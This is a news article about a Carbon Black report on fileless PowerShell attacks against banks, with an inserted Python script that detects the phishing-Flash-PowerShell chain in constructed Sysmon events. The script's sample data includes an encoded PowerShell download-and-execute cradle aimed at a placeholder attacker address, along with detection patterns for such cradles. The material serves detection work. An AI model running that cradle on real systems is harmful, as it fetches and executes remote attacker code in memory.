Intruders are starting to use “good tools,” such as PowerShell and Secure Shell, to gain entry into financial networks through existing software rather than planting malware, and more than half of successful breaches are now fileless attacks, says a Carbon Black report.
The financial sector is among those that have taken the strongest steps toward cybersecurity, but it still focuses more on prevention than detection, something that must change in this new environment, says the report, “Modern Bank Heists: Cyberattacks & Lateral Movement in the Financial Sector.”
One possible solution: About 37 percent of financial institutions have established threat hunting teams that actively search for potential problems before any damage is done.
“Perimeter-based security based on defense in depth will not succeed in defending our infrastructure against the threats of today,” says Tom Kellermann, chief cybersecurity officer for Carbon Black.
Flash Remains an Attack Vector
The report outlines a typical attack built from these tools: A user, prompted by a phishing email, visits a web page under the attacker's control. The page serves a malicious Flash file that exploits the browser's Flash plugin; the exploit launches PowerShell and feeds it instructions. PowerShell then connects to the attacker's server, downloads a script and runs it in memory, and that script locates valuable data and sends it back to the attacker. No executable is ever written to disk, which is what makes the chain "fileless" and why signature-based prevention tends to miss it.
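Each stage of that chain leaves a trace in endpoint telemetry: a browser process spawning powershell.exe, a hidden or encoded launch command, a download cradle in the command line, and an outbound connection from PowerShell to an external host. The following Python is an added example, not code from the report or from Carbon Black, that checks constructed Sysmon-style events (ID 1 process creation, ID 3 network connection, reduced to JSON with assumed field names) for those traces. The browser list, the flag and cradle patterns, and the 203.0.113.10 documentation address standing in for the attacker's server are all assumptions.

```python
"""Detect the phishing -> Flash -> PowerShell -> download-cradle chain in
Sysmon-style process and network events. Added example; the events and
field names below are constructed, not taken from the report."""
import base64
import ipaddress
import json
import re
from typing import Dict, List

# Assumed: browsers (and the standalone Flash host) that should never spawn PowerShell.
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# Launch flags that hide the window, skip the profile, or pass an encoded script.
SUSPICIOUS_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b"
    r"|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download-and-execute primitives typical of a stage-two fetch.
CRADLE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b"
    r"|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer", re.I)
# Anything outside RFC 1918, loopback and link-local counts as external here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample: the attacker's stage-two fetch, encoded the way
# PowerShell -EncodedCommand expects it (base64 of UTF-16LE text).
PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString("
           "'http://203.0.113.10/stage2.ps1')")
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # 1. Browser (Flash exploit host) spawns hidden, encoded PowerShell.
    json.dumps({"EventID": 1, "ProcessId": 4120, "Image": PS,
                "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
                "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + ENC}),
    # 2. That PowerShell reaches out to the attacker's server.
    json.dumps({"EventID": 3, "ProcessId": 4120, "Image": PS,
                "DestinationIp": "203.0.113.10", "DestinationPort": 80}),
    # 3. Benign admin launch from the shell, running a script from disk.
    json.dumps({"EventID": 1, "ProcessId": 5200, "Image": PS,
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"}),
    # 4. Benign PowerShell connection to an internal host.
    json.dumps({"EventID": 3, "ProcessId": 5200, "Image": PS,
                "DestinationIp": "10.0.0.5", "DestinationPort": 445}),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of an -EncodedCommand argument, or '' if none/undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def is_external(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def analyze(lines: List[str]) -> List[Dict]:
    """Return one finding per PowerShell event that matches a stage of the chain."""
    findings = []
    for raw in lines:
        ev = json.loads(raw)
        if basename(ev.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
            continue
        reasons = []
        if ev["EventID"] == 1:
            parent = basename(ev.get("ParentImage", ""))
            if parent in BROWSER_PARENTS or "flash" in parent:
                reasons.append(f"spawned by browser/Flash host {parent}")
            cmd = ev.get("CommandLine", "")
            if SUSPICIOUS_FLAGS.search(cmd):
                reasons.append("hidden/encoded/no-profile launch flags")
            if CRADLE.search(cmd):
                reasons.append("download cradle in plain command line")
            elif CRADLE.search(decode_encoded_command(cmd)):
                reasons.append("download cradle hidden in -EncodedCommand payload")
        elif ev["EventID"] == 3 and is_external(ev.get("DestinationIp", "")):
            reasons.append(f"outbound connection to external host "
                           f"{ev['DestinationIp']}:{ev.get('DestinationPort')}")
        if reasons:
            findings.append({"pid": ev.get("ProcessId"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], "; ".join(f["reasons"]))
```

Run against the constructed events, the browser-spawned process is flagged on all three launch checks and again on its connection to 203.0.113.10, while the administrator's script launch and its internal connection produce nothing. Decoding the `-EncodedCommand` argument before pattern matching matters: the plain command line contains no cradle string at all, so a detector that looks only at the raw text sees nothing.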
Among Carbon Black customers surveyed, 97 percent have been targeted by a nonmalware attack in the past two years, according to the report, and 90 percent reported attempted ransomware attacks.
“There is a common theme why cybercriminals are increasingly leveraging non-malware attacks: they are following the path of least resistance,” the report states, but adds, “The fact that 90 percent of CISOs reported seeing such an attack leveraging PowerShell is a good thing.”
Cut Back on Intruder Dwell Time
The ultimate goal should be to decrease dwell time, the interval between an attacker's initial compromise of a system and the breach being detected. The median dwell time is now about 101 days, according to a Mandiant report released in April. Other reports, including Carbon Black's, put the figure closer to 200 days or more.
“Detection needs to happen before it gets to the system,” says Karen Scarfone, principal consultant for Scarfone Cybersecurity. That’s true especially when the attack comes in a fileless form, she adds: “It can be easier to get in.”
Threat hunting teams can be valuable in cutting down dwell time, according to the Carbon Black report, proactively running down clues that intruders may be present. Such a team should be multidisciplinary, Kellermann says, including incident response experts, “red team” members, risk managers and people with other forms of IT expertise.
These teams would bring a flexibility not always present in incident response, enabling a financial institution to handle counter incident response, in which attackers who notice defenders reacting strike back at them, according to the report (1 in 4 financial institutions experience such counterattacks after responding defensively).
“Teams should be prepared to throw out the IR playbook when necessary,” the report states.
The Value of Threat Hunting Teams Varies
Threat hunting, however, can be controversial, says Scarfone. Some enterprises say that it works, but others “think it is ineffective for the amount of money that it costs,” she says.
“People who do threat hunting well tend to be very expensive professionals,” she says. “But for a large financial institution, that might be worthwhile to them because they’re facing such significant threats.”